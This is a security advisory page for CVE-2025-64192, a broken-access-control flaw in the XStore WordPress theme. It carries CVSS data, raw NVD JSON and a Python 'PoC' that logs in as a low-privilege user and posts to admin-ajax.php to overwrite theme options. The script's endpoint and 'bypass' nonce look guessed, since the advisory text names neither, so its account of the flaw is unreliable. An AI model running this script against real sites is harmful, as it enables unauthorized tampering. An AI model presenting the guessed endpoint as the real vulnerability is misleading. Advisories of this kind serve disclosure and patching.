Security Vulnerability Report
中文
CVE-2025-64192 CVSS 6.3 MEDIUM

CVE-2025-64192

Published: 2025-12-18 08:16:11
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in 8theme XStore xstore allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects XStore: from n/a through < 9.6.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

XStore < 9.6(所有低于9.6的版本均受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64192 PoC - XStore Theme Authorization Bypass import requests import sys target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-site.com' username = 'attacker' # Low-privilege user account password = 'password123' # Step 1: Authenticate and get nonce session = requests.Session() login_url = f'{target_url}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Login' } response = session.post(login_url, data=login_data) # Step 2: Exploit the authorization bypass # Target vulnerable AJAX endpoint ajax_url = f'{target_url}/wp-admin/admin-ajax.php' # Example: Modify theme settings without proper authorization payload = { 'action': 'xstore_settings_save', # Vulnerable action 'option_name': 'xstore_theme_options', 'option_value': 'malicious_value', 'security': 'bypass_this' # Missing or weak nonce validation } response = session.post(ajax_url, data=payload) print(f'Status Code: {response.status_code}') print(f'Response: {response.text}') # Check if unauthorized action was executed if response.status_code == 200: print('[+] Potential authorization bypass detected')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64192", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:10.500", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in 8theme XStore xstore allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects XStore: from n/a through < 9.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/xstore/vulnerability/wordpress-xstore-theme-9-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}